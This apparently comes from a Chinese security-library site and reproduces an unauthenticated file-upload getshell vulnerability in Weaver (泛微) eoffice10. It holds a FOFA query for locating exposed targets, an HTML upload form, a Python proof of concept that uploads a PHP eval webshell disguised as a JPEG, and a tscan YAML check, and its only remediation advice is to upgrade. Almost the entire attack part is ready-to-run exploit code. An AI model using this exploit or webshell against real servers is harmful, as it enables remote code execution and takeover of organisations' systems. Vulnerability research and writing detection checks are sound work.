泛微 eoffice10 前台 getshell漏洞复现--漏洞文库小世界-安全文库-NGC660 安全实验室

泛微 eoffice10 前台 getshell漏洞复现-

一、漏洞详情

2022年护网期间公开漏洞显示泛微eoffice10前台存在文件上传漏洞可getshell
m_8fdc0ceff2db416be90fe51add7cf476_r

二、漏洞影响范围

漏洞影响的产品版本包括:泛微oeoffice10

三、漏洞复现

使用 fofa搜索
title=“eoffice10”
构造html页面

<form method='post'
action='http://xx.xx.xx.xx:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php'
enctype="multipart/form-data" >
<input type="file" name="FileData"/></br></br>
<input type="text" name="FormData" value="{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'teststcs.php'}"/></br></br>
<button type=submit value="上传">上传</button> </form>

将action 部分替换为目标地址
打开网页即可上传php脚本文件获取webshell

m_e254d41cbc7cc3a08c5318db1f15b750_r
编写漏洞POC

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @userVersion : python 3.7
# @Author  : fsrm
# @Data    : 2022/08/08
# @Effect  : temp
# @Version : V1.1

import json
import sys
from urllib.parse import urlsplit

import requests
Header={
    'Content-Length': '397',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'Origin': 'null',
    # 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundarypgyxaBmmbboTooNw',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36',
    'Accept-Language': 'zh-CN',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
    'Sec-GPC': '1',
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'close'
}

# proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080" }

def checkversion(baseurl):
    versionurl = baseurl + "/eoffice10/version.json"
    try:
        r=requests.get(versionurl,verify=False, timeout=10)
        jsonres=json.loads(r.text)
        if jsonres['version']==10:
            # print(jsonres)
            return True
        else:
            return False
    except Exception as e:
        print(str(e))
    return False

def postdata(baseurl):
    posturl=baseurl+"/eoffice10/server/public/iWebOffice2015/OfficeServer.php"
    files={
        "FileData": ("1.jpg", "<?php echo(md5(cde4f31a5));@eval($_POST[stcs]);?>","image/jpeg"),
        "FormData": (None, "{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'cde4f31a5.php'}")
    }
    # r=requests.post(posturl,data=None,headers=Header,files=files,proxies=proxies)
    r = requests.post(posturl, data=None, headers=Header, files=files,verify=False, timeout=10)
    return

def checkresult(baseurl):
    checkurl=baseurl+"/eoffice10/server/public/iWebOffice2015/Document/cde4f31a5.php"
    # print(checkurl)
    r=requests.get(checkurl,verify=False, timeout=10)
    if "4e700eabf8fc3788516fb02c5d4e38e2" in r.text:
        print("[+]存在漏洞 shell地址:"+checkurl)
    else:
        print("[-] 不存在漏洞")
def main(url):
    result = urlsplit(url)
    basetarget=result.scheme+"://"+result.netloc
    # print(basetarget)
    versionres=checkversion(basetarget)
    if versionres==False:
        print("不存在漏洞")
        return
    # 上传文件
    postdata(basetarget)

    # 验证结果
    checkresult(basetarget)

if __name__ == '__main__':
    if len(sys.argv)>1:
        url=sys.argv[1]
        main(url)
    else:
        print("usg: python eoffice10upload.py http://xxxxxxxx")

执行结果

m_98fa886714a94853a99ec63198c93479_r

tscan poc

params: []
name: fanwei_eoffice10_getshell_2022.08
set:
  randstr: randomLowercase(10)
  randint: randomInt(800000000, 1000000000)
rules:
- method: POST
  path: /eoffice10/server/public/iWebOffice2015/OfficeServer.php
  headers:
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8vJ2eQQn6YZjc9Zm
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
      like Gecko) Chrome/104.0.5112.81 Safari/537.36
  body: |-
    ------WebKitFormBoundary8vJ2eQQn6YZjc9Zm
    Content-Disposition: form-data; name="FileData"; filename="1.jpg"
    Content-Type: image/jpeg

    <?php echo(md5({{randint}}));?>
    ------WebKitFormBoundary8vJ2eQQn6YZjc9Zm
    Content-Disposition: form-data; name="FormData"

    {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'{{randstr}}.php'}
    ------WebKitFormBoundary8vJ2eQQn6YZjc9Zm--
  search: ""
  followredirects: false
  expression: response.status==200
- method: GET
  path: /eoffice10/server/public/iWebOffice2015/Document/{{randstr}}.php
  headers: {}
  body: ""
  search: ""
  followredirects: false
  expression: response.status==200 && response.body.bcontains(bytes(substr(md5(string(randint)),0,
    31)))
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

四、漏洞处置建议
尽快升级到最新版本。

请登录后发表评论

    请登录后查看回复内容